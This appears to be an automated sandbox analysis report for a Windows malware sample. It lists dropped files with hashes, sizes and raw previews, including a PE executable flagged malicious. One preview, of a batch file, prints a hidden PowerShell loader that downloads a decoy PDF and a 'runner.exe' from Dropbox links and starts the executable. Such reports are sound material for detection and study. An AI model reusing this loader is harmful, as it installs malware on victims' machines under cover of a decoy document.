                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2278
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8452208714888876
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKxrgxzxl9Il8udmyDX5Ai+XpzgKBY8Cd1rc:myYbmy1L4z368h
                                                                                                                                                                                                                                                                                              MD5:DAF9C8E4406B3434E9813BF243DF86F3
                                                                                                                                                                                                                                                                                              SHA1:8246264B7D6FDD53B61BC60A2B669422ECCD1993
                                                                                                                                                                                                                                                                                              SHA-256:43DF99E7DFE82955AF8DA74AE33386E3EC9FB4063A405A03EC7228F6643C58F9
                                                                                                                                                                                                                                                                                              SHA-512:2DBC97A09014EF450E8E549B76798213D794C56AE340EB86C538954191986EEDDFB2D3C0E33245EA79EF8E3CB29CEAEED100B9F66B197AFF4B45B0E80ED8BC9A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.B.x.E.+.T.J.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.M.z.A.U.6.Z.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4622
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.000591922419534
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKxExUxD9Il8u+0d78eEhW01UaMZ5pa2wTQcU9a6j0SxWKOwlg3DQ95Kc/O1:OYE0h8dhW0KaMZ5pdcEHQKOwlD95VC
                                                                                                                                                                                                                                                                                              MD5:6C2BB2975FA62F1D4FE32EB66B33EDBE
                                                                                                                                                                                                                                                                                              SHA1:4F5CEB7BA666CF665D285BECF926D492924681FC
                                                                                                                                                                                                                                                                                              SHA-256:1823C206BB72040A7CC26705A6E5DA13C78D07ABA766CE52DCC2F37119CA0CB0
                                                                                                                                                                                                                                                                                              SHA-512:140F1123C386F64051E894A83425F3B8593863D99268E0CA944B4D8EA38B178E4225159F64B0ABBC28CCDD63F374460984B67A4CDD61B01266561EA3F372B02F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Y.C.g.i.3.y.p.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.M.z.A.U.6.Z.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2684
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.892689255406663
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKx68Wa7xQxl9Il8uNbESOXbCL6LAy6NRfmSlEGzcR1HGwAo9vqgd/vc:aSYnsXblLAy6N5murs1HGwAo9qZ
                                                                                                                                                                                                                                                                                              MD5:8B10D38AB6920DBD2957E4929A1060B8
                                                                                                                                                                                                                                                                                              SHA1:84B244DDD041DD4E5B8B8BE072C0F0B3EC16867A
                                                                                                                                                                                                                                                                                              SHA-256:F5C5F6D72C8827C9DDC3B0951238D8A574FC8B5C7D442FA3AED5F71F786F22EF
                                                                                                                                                                                                                                                                                              SHA-512:C07E946DDBD74CFE01C2822F048C316A928417DA28B3853E510A29F98FC1DBE8B82A62A2DF35FB9DBA633DABAD377FA58A4F7EF432C843038443E6BD728E30EA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".d.P.r.U.D.v.x.p.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.M.z.A.U.6.Z.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61147
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.077943793919534
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
                                                                                                                                                                                                                                                                                              MD5:95B7548D8D8DDBAB0877BFC7F500503D
                                                                                                                                                                                                                                                                                              SHA1:894B9735A30AE067FF88622B4F9C8EDF36997F6F
                                                                                                                                                                                                                                                                                              SHA-256:D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
                                                                                                                                                                                                                                                                                              SHA-512:B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Nlllul9kLZ:NllUG
                                                                                                                                                                                                                                                                                              MD5:087D847469EB88D02E57100D76A2E8E4
                                                                                                                                                                                                                                                                                              SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                                                                                                                                                                                                                                                                              SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                                                                                                                                                                                                                                                                              SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:@...e.................................,..............@..........

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\111392827.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1843712
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.178746640907945
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:jgroExwGqf9gSdRye+kwlwW5maKlkvKNeEK4V0:sroExTk9gSdkt
                                                                                                                                                                                                                                                                                              MD5:EB40135D3E0FE985A9E09970DC09A499
                                                                                                                                                                                                                                                                                              SHA1:8AF34D2B5006683471BF521745FC08F75E25F5A5
                                                                                                                                                                                                                                                                                              SHA-256:AA0DE67AABBC67EFFDEEF899E9B68E072AA927BFEC1D95202740702615FE06F6
                                                                                                                                                                                                                                                                                              SHA-512:BE9D06812BDF15374EBA53053CE3BF3BE98FA26DC6F0C7361F0458ECAFBE03ABB7840C3A0995843D2CB31316CDDACF74ABD992952F7C9957E83A4455D71FD592
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0..0..0......1......3......*....].3....^.=....H.%....O.?....X.'..0.......A......_.1....Z.1..Rich0..................PE..L......e.....................v.......4............@..........................P.......f....@..................................+..........$................S...p.........................................@...............p............................text............................... ..`.rdata..............................@..@.data....0...`.......H..............@....rsrc...$............d..............@..@........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\1262855704.pdf

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):106848
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                              MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                              SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                              SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                              SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\187c56da-8fec-41b0-b99c-7b907475015f.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11185
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                              MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                              SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                              SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                              SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\2b1d378d-4ac4-4684-b0e2-97db657d1bdf.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\399226976.bat

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:DOS batch file, ASCII text, with very long lines (459), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):519
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.554735877741627
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:0G81kFX0b11JkdhdEBfH1MRdEFvtyJkP1i3sQBvg2Wgn:0GpObJQEF+YCJaf2WQ
                                                                                                                                                                                                                                                                                              MD5:D6FEF04E6A7EFD2593AD7FCE9D652DA1
                                                                                                                                                                                                                                                                                              SHA1:035200B8F59E5A3BBB577FE57CBFC08155324358
                                                                                                                                                                                                                                                                                              SHA-256:C66E540FB7A5EC364C3CDE98BA97FD02C057D4FAE5099C596E0B53EBD9918FF2
                                                                                                                                                                                                                                                                                              SHA-512:285696A4DCD6E4CCD4BA698AABC0A142D35E1B5EC68DADFE725BFBD815EF2043249DFFB1748A2BBD3B521CE3C66257E5AF0040B78B3D0FAC5CF6D55E3582B9B3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Preview:@echo off..powershell -WindowStyle Hidden -Command ^.. "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"..exit

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\514caa7d-d88d-43b4-a0cd-fea70da147cd.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):206855
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.983991878155761
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEIx:l81Lel7E6lEMVo/S01fDpWmEgr
                                                                                                                                                                                                                                                                                              MD5:03E0A41C7EF64C946D818C2F5E4B7EC3
                                                                                                                                                                                                                                                                                              SHA1:B3FEB76961D6A54EB9566EAC7E688BC55394B672
                                                                                                                                                                                                                                                                                              SHA-256:CA2E03394F3B161D3A1E25F6A77B28EFDAB1D7989A0A1C2B6FC1764D8C27B7C7
                                                                                                                                                                                                                                                                                              SHA-512:3F775790206CADE3A9CFBDCC3C081611330D525222D43085749A98D975B779109DF305799C53386E4B251D1D892735F5B4B31E6CD95475D0606BDD13BDB24001
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\528a072e-80ed-41df-baf1-61d3b51afb44.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 276634
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):263704
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.998774950072608
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:6144:vj1QHfvuVtTT0bCnop1MIPG4y9XgcbKdhRuQRhzb6d0X7ayNC:vjq/GGCnorP0952dPuQRFW0X2yk
                                                                                                                                                                                                                                                                                              MD5:EF6DB67B82032D675EA4E61A73D3C358
                                                                                                                                                                                                                                                                                              SHA1:882A4CF2944FC8E27F435890DF647177AD167CB0
                                                                                                                                                                                                                                                                                              SHA-256:97C885F4390FFAE57EF240B46E113A0DFF637A003B6AD54031A1AA6809956276
                                                                                                                                                                                                                                                                                              SHA-512:B41B3CD76F50964CD4FA0AB18BEB785FA592CB92045B3455D238799A1167CB5190EB1C7E0216E1E874AA03A8686025A6B366926023C9C56834B92B4F612D0A18
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:............ko..q?....Am..0.<.M...e.B,[......|J..............x..8. .w73;;;;....L.....La.k&.k..........~...#..........%.Y.>}.j~.O.r..L....R.`..w......ta.'.....~:.9.'C...|..Gt...'..y..?...}..........,....1?..)QX....tgpgN.`..~...'.h.3^.s..UT...~o..R.].4^..V8"JwfnH...%..........i.qmG4.1@....a....\.i.C..Rq9.h....\..j...u..O..O.5!.}x....%j..}CW+.*..jaA.......-...*....P?..vA3+iU...N...%...x.E.8.Z..2HQw._.H8........+Lw].wL..........tc..l.+p..7..<).......Z.!..!i......?./.P9.y..;....,..C.K.....~.0........E...n..(..&.X...na-c.6.....Q.[.p.IO....[...W$....l7J.,..=EK.3Y...R...|..z_i.q......./.......[..5..qE.....FM+..VRB...r9!{3.....!...;.,{..}.sP..m..f.....~..2J..4.+..i6M...EW..ON..N.........4...T...j...1:..E=..<....Y..w.MV.....w.q.{...Y.....J...@.W..i.Sm;..0.1......./.4..b.wPbK.yeZ@.I...0.C.TZ$...-.+.[*......w.qG..}B^........n....#.........Y4.g4.....(.K..e..q7[.{..W....,%...z.^N...[/?......).9/?...r].oM2.'G.gu..Q|..._+......1^...9......-.j2lae..+!3

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\52f59333-f6c5-46a6-a1bc-1a48610864c3.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):76321
